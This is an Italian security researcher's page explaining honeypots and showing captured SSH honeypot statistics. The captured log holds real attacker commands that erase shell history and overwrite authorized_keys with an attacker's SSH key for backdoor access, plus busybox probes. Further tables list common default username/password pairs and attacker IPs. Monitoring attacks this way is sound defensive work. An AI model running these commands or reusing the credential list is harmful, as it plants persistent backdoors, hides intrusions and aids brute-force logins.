ENG ITA

# Ethical Hacker & ICT Security Specialist

Honeypot

In informatica, una honeypot (letteralmente: "barattolo di miele") è un sistema o componente hardware/software usato come esca al fine di studiare ed analizzare gli attacchi informatici in tempo reale.

Solitamente consiste in uno o più siti o servizi che sembrano essere parte della rete e che contengono informazioni preziose per un attaccante, ma che in realtà sono ben isolati e non contegono dati reali, ma forniscono a chi li amministra tutti i dettagli degli attacchi informatici subiti.

Il valore primario di una honeypot è quindi l'informazione che essa dà sulla natura e la frequenza di eventuali attacchi subiti.

Se sei curioso di scoprire questo mondo, guarda le statistiche degli attacchi in tempo reale che ora dopo ora vengono rilevati dalla mia rete di honeypot:

Dizionari live

E' possibile scaricare dizionari di password, nomi utente e coppie user/pass estrapolati dagli attacchi verso il servizio SSH:

Tutte le statistiche della honeypot di seguito:

SSH

×
Last 50 commands executed
DateCommandSource
2019-03-19 19:10:34uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd103.237.147.69 Vietnam
2019-03-19 19:05:13uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd103.237.147.69 Vietnam
2019-03-19 18:16:46uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd112.133.218.125 India
2019-03-19 18:01:17uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd139.59.79.56 India
2019-03-19 17:55:25uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd159.89.116.97 Canada
2019-03-19 17:50:27uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd159.89.116.97 Canada
2019-03-19 17:46:40uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd159.89.164.167 India
2019-03-19 17:41:39uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd159.89.164.167 India
2019-03-19 17:07:15 cat /bin/echo ;/gisdfoewrsfdf185.234.217.217 Ireland
2019-03-19 17:07:15/gisdfoewrsfdf185.234.217.217 Ireland
2019-03-19 17:07:15185.234.217.217 Ireland
2019-03-19 17:07:14185.234.217.217 Ireland
2019-03-19 17:07:14/gisdfoewrsfdf185.234.217.217 Ireland
2019-03-19 17:07:14/gisdfoewrsfdf185.234.217.217 Ireland
2019-03-19 17:07:14185.234.217.217 Ireland
2019-03-19 17:07:13185.234.217.217 Ireland
2019-03-19 17:07:13 echo -e '\\x47\\x72\\x6f\\x70/' > //.nippon; cat //.nippon; rm -f //.nippon185.234.217.217 Ireland
2019-03-19 17:07:13185.234.217.217 Ireland
2019-03-19 17:07:13 echo -e '\\x47\\x72\\x6f\\x70/lib/init/rw' > /lib/init/rw/.nippon; cat /lib/init/rw/.nippon; rm -f /lib/init/rw/.nippon185.234.217.217 Ireland
2019-03-19 17:07:13185.234.217.217 Ireland
2019-03-19 17:07:13 echo -e '\\x47\\x72\\x6f\\x70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon185.234.217.217 Ireland
2019-03-19 17:07:13185.234.217.217 Ireland
2019-03-19 17:07:13 echo -e '\\x47\\x72\\x6f\\x70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon185.234.217.217 Ireland
2019-03-19 17:07:13185.234.217.217 Ireland
2019-03-19 17:07:13 echo -e '\\x47\\x72\\x6f\\x70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon185.234.217.217 Ireland
2019-03-19 17:07:13185.234.217.217 Ireland
2019-03-19 17:07:13 echo -e '\\x47\\x72\\x6f\\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon185.234.217.217 Ireland
2019-03-19 17:07:13185.234.217.217 Ireland
2019-03-19 17:07:13 echo -e '\\x47\\x72\\x6f\\x70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon185.234.217.217 Ireland
2019-03-19 17:07:12185.234.217.217 Ireland
2019-03-19 17:07:12sudo /bin/sh 185.234.217.217 Ireland
2019-03-19 17:07:12185.234.217.217 Ireland
2019-03-19 17:07:12/bin/busybox cp; /gisdfoewrsfdf185.234.217.217 Ireland
2019-03-19 17:07:12/gisdfoewrsfdf185.234.217.217 Ireland
2019-03-19 17:07:12185.234.217.217 Ireland
2019-03-19 17:07:12 mount ;/gisdfoewrsfdf185.234.217.217 Ireland
2019-03-19 17:07:12/gisdfoewrsfdf185.234.217.217 Ireland
2019-03-19 17:07:12185.234.217.217 Ireland
2019-03-19 17:07:12 echo -e '\\x47\\x72\\x6f\\x70/' > //.nippon; cat //.nippon; rm -f //.nippon185.234.217.217 Ireland
2019-03-19 17:07:12185.234.217.217 Ireland
2019-03-19 17:07:12 echo -e '\\x47\\x72\\x6f\\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon185.234.217.217 Ireland
2019-03-19 17:07:12185.234.217.217 Ireland
2019-03-19 17:07:12 echo -e '\\x47\\x72\\x6f\\x70/var/tmp' > /var/tmp/.nippon; cat /var/tmp/.nippon; rm -f /var/tmp/.nippon185.234.217.217 Ireland
2019-03-19 17:07:11/gisdfoewrsfdf185.234.217.217 Ireland
2019-03-19 17:07:11/gisdfoewrsfdf185.234.217.217 Ireland
2019-03-19 16:41:51uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd170.231.81.165 Peru
2019-03-19 16:34:23 cat /bin/echo ;/gisdfoewrsfdf185.234.217.217 Ireland
2019-03-19 16:34:23/gisdfoewrsfdf185.234.217.217 Ireland
2019-03-19 16:34:23185.234.217.217 Ireland
2019-03-19 16:34:22 echo -e '\\x47\\x72\\x6f\\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon185.234.217.217 Ireland
×
Last 20 sessions
DateSource
2019-03-19 19:31:255.188.87.51 Russian Federation
2019-03-19 19:31:215.188.86.207 Ireland
2019-03-19 19:31:12134.19.187.78 Netherlands
2019-03-19 19:31:0888.214.26.90
2019-03-19 19:31:075.188.87.51 Russian Federation
2019-03-19 19:30:515.188.86.211 Ireland
2019-03-19 19:30:41134.19.187.78 Netherlands
2019-03-19 19:30:375.188.87.49 Russian Federation
2019-03-19 19:30:375.188.86.174 Ireland
2019-03-19 19:30:345.188.86.197 Ireland
2019-03-19 19:30:3488.214.26.88
2019-03-19 19:30:3488.214.26.89
2019-03-19 19:30:33134.19.187.75 Netherlands
2019-03-19 19:30:22185.254.120.6
2019-03-19 19:30:22185.254.120.6
2019-03-19 19:30:225.188.86.195 Ireland
2019-03-19 19:29:56134.19.187.75 Netherlands
2019-03-19 19:29:555.188.86.164 Ireland
2019-03-19 19:29:515.188.86.207 Ireland
2019-03-19 19:29:445.188.86.165 Ireland
×
TOP 15 USER+PASS
CountUsernamePassword
122935 adminadmin123
13784 rootchangeme
3927 admin
1327 adminaerohive
1288 ubntubnt
647 adminadmin
510 supportsupport
403 rootadmin
367 useruser
332 serviceservice
314 root!@
297 piraspberry
251 guestguest
245 usuariousuario
216 rootroot
×
TOP 20 SUCCESSFUL LOGIN IPs
CountSource
89045.188.86.174 Ireland
840994.26.234.6 Russian Federation
763294.26.234.7 Russian Federation
51435.188.86.211 Ireland
504794.26.234.5 Russian Federation
495288.214.26.88
454588.214.26.89
43665.188.87.55 Russian Federation
42135.188.87.51 Russian Federation
41625.188.87.49 Russian Federation
378794.26.234.35 Russian Federation
317188.214.26.90
31395.188.87.53 Russian Federation
3035195.3.147.49 Latvia
30085.188.87.52 Russian Federation
29625.188.87.54 Russian Federation
2880134.19.187.78 Netherlands
263594.26.234.36 Russian Federation
25685.188.86.194 Ireland
24115.188.86.197 Ireland
×
TOP 20 attackers
ConnectionsSource
90215.188.86.174 Ireland
841294.26.234.6 Russian Federation
763794.26.234.7 Russian Federation
7004150.138.183.254 China
58025.101.40.100 Russian Federation
54015.101.40.166 Russian Federation
51665.188.86.211 Ireland
504794.26.234.5 Russian Federation
502888.214.26.88
461688.214.26.89
43665.188.87.55 Russian Federation
42175.188.87.51 Russian Federation
41645.188.87.49 Russian Federation
3877159.89.164.57 India
378894.26.234.35 Russian Federation
317288.214.26.90
3145195.3.147.49 Latvia
31425.188.87.53 Russian Federation
30115.188.87.52 Russian Federation
29625.188.87.54 Russian Federation

Se vuoi guardare il codice che genera questa pagina, vai al sito del mio progetto HoneyStats! (github)

Vuoi ancora di più? Seguimi all'interno del laboratorio!